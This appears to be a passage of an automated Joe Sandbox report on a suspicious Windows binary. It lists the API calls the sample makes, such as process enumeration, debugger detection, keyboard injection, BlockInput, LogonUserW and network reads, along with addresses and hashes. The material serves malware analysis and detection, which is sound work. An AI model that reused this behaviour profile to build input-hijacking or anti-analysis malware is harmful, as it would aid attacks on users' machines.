                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-2872873767
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
• String ID: *.*$\VH
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CF63
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0046CF75
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
                                                                                                                                                                                                                                                                                                                                                                                                                                • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2728119192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: DOWN
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031425849-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4170576061-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 48322524-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __time64.LIBCMT ref: 00442E1E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004148B3: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00430E3E,00000000,?,?,00441E36,?,00000001), ref: 004148BE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004148B3: __aulldiv.LIBCMT ref: 004148DE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @uJ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1268412911
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DEB4
• FindClose.KERNEL32(00000000), ref: 0045DEF0
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AF9D
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AFB6
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: N@
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1509896676
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f26af1cc35ee436bd35c112aa55096a99c16bebf167bfb6d01eec10cb43c1f13
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1018078A00209EFCB44DF98C5909AEF7B5FB48310F2086A9E809A7705D730BE41DB80
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
